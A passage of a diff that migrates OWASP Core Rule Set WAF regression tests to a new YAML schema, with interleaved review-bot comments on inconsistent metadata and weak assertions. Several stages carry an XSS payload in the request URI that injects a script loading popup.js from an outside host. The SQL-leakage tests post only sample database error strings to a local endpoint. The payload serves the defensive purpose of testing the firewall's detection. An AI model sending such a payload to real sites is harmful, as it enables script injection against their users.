'/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [949110] + - test_id: 2 desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: 
GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: http://www.coreruleset.org - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "949110" - - test_title: 949110-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: http://www.coreruleset.org + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [949110] + - test_id: 3 desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/options" - version: "HTTP/1.1" - output: - no_log_contains: "id \"949110\"" - - test_title: 949110-4 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/options" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [949110] + - test_id: 4 desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "REALLYLONGUNREALMETHOD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"949110\"" - - test_title: 949110-5 + - input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [949110] + - test_id: 5 desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: " + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + match_regex: 'Inbound Anomaly Score Exceeded \(Total Score: ' 
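Review bot: The `desc` of the last test still refers to `949110-0 (see above)`, but the stage it duplicates is now `test_id: 1` and a `-0` test has never existed in this file, so the reference should read `desc: Test is basically identical to 949110-1 (see above) but here we assert that the scores are summed up and reported properly`. The new `match_regex: 'Inbound Anomaly Score Exceeded \(Total Score: '` only proves the message prefix was logged, which does not establish that the scores were "summed up and reported properly" as the description claims, and unlike the other four stages it no longer ties the assertion to rule 949110. A tighter form is `match_regex: 'Inbound Anomaly Score Exceeded \(Total Score: [1-9][0-9]*'` together with `expect_ids: [949110]` in the same `log` block, assuming the 1.x `log` schema evaluates both keys; if it does not, the regex alone should at least require a non-zero score.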
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml index b6df65d0c..cf9e40a07 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951110.yaml" - description: "Regression tests for rule 951110" +rule_id: 951110 tests: - - test_title: 951110-1 + - test_id: 1 desc: "Matching Microsoft Access SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} - output: - log_contains: "id \"951110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} + output: + log: + expect_ids: [951110] 
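Review bot: `meta.description` is removed here and in the 951120, 951130, 951140 and 951160 hunks, while the 951150 hunk keeps `description: "Regression tests for rule 951150"` next to the new `rule_id`, so the six sibling files end up with two different `meta` shapes. Either keep `description: "Regression tests for rule 951110"` alongside `rule_id: 951110` in each file or drop it in 951150 as well. Each of these files also has only the positive `/reflect` stage; a second stage posting a benign body with `no_expect_ids: [951110]` would detect a future over-match in the response-body inspection, which the current single stage cannot.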
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml index 1c9318bd6..84bc18f98 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml @@ -1,29 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951120.yaml" - description: "Regression tests for rule 951120" +rule_id: 951120 tests: - - test_title: 951120-1 + - test_id: 1 desc: "Matching Oracle SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} - - output: - log_contains: "id \"951120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} + output: + log: + expect_ids: [951120] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml index a7c83eff3..beb26bbef 100644 
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951130.yaml" - description: "Regression tests for rule 951130" +rule_id: 951130 tests: - - test_title: 951130-1 + - test_id: 1 desc: "Matching DB2 SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} - output: - log_contains: "id \"951130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} + output: + log: + expect_ids: [951130] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml index c55031406..25fcdcf04 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951140.yaml" - description: "Regression tests for rule 951140" +rule_id: 951140 tests: - - test_title: 951140-1 + - test_id: 1 desc: "Matching EMC SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} - output: - log_contains: "id \"951140\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} + output: + log: + expect_ids: [951140] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml index 2e02f92f5..161aaea10 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml 
@@ -1,28 +1,27 @@ --- meta: author: "azurit" - enabled: true - name: "951150.yaml" description: "Regression tests for rule 951150" +rule_id: 951150 tests: - - test_title: 951150-1 + - test_id: 1 desc: "Matching firebird SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} - output: - log_contains: "id \"951150\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} + output: + log: + expect_ids: [951150] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml index 088e2d36f..c92333950 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml 
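Review bot: `description: "Regression tests for rule 951150"` survives in this hunk as an unchanged context line (the header's `+1,27` versus the siblings' `+1,26` reflects it), while every other file in this directory drops `description` together with `enabled` and `name` and keeps only `author` under `meta` plus the top-level `rule_id`. That looks like an oversight in the mechanical migration rather than an intentional difference; removing the line here keeps the `meta` block identical across the 951xxx files, or, if the new schema is meant to carry a description, it should be restored in all of them rather than in one.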
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951160.yaml" - description: "Regression tests for rule 951160" +rule_id: 951160 tests: - - test_title: 951160-1 + - test_id: 1 desc: "Matching Frontbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} - output: - log_contains: "id \"951160\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} + output: + log: + expect_ids: [951160] 
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml index 60ad4b95f..85bcf4ac6 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951170.yaml" - description: "Regression tests for rule 951170" +rule_id: 951170 tests: - - test_title: 951170-1 + - test_id: 1 desc: "Matching hsqldb SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} - output: - log_contains: "id \"951170\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} + output: + log: + expect_ids: [951170] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml index 7ac83ba06..57f2cdc95 100644 
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951180.yaml" - description: "Regression tests for rule 951180" +rule_id: 951180 tests: - - test_title: 951180-1 + - test_id: 1 desc: "Matching informix SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} - output: - log_contains: "id \"951180\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} + output: + log: + expect_ids: [951180] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml index b1ca7c7b1..d717ef4f3 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml 
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951190.yaml" - description: "Regression tests for rule 951190" +rule_id: 951190 tests: - - test_title: 951190-1 + - test_id: 1 desc: "Matching ingres SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} - output: - log_contains: "id \"951190\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} + output: + log: + expect_ids: [951190] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml index a190b55e2..ee8a31012 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml 
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951200.yaml" - description: "Regression tests for rule 951200" +rule_id: 951200 tests: - - test_title: 951200-1 + - test_id: 1 desc: "Matching interbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} - output: - log_contains: "id \"951200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} + output: + log: + expect_ids: [951200] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml index f65083eb9..28239707b 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml 
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951210.yaml" - description: "Regression tests for rule 951210" +rule_id: 951210 tests: - - test_title: 951210-1 + - test_id: 1 desc: "Matching maxDB SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} - output: - log_contains: "id \"951210\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} + output: + log: + expect_ids: [951210] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml index 18d37f411..b66b43f98 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml 
@@ -1,50 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951220.yaml" - description: "Regression tests for rule 951220" +rule_id: 951220 tests: - - test_title: 951220-1 + - test_id: 1 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} - output: - log_contains: "id \"951220\"" - - - test_title: 951220-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. 
(severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} + output: + log: + expect_ids: [951220] + - test_id: 2 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} - output: - log_contains: "id \"951220\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} + output: + log: + expect_ids: [951220] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml index 972e41e9e..ee66a9da0 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml 
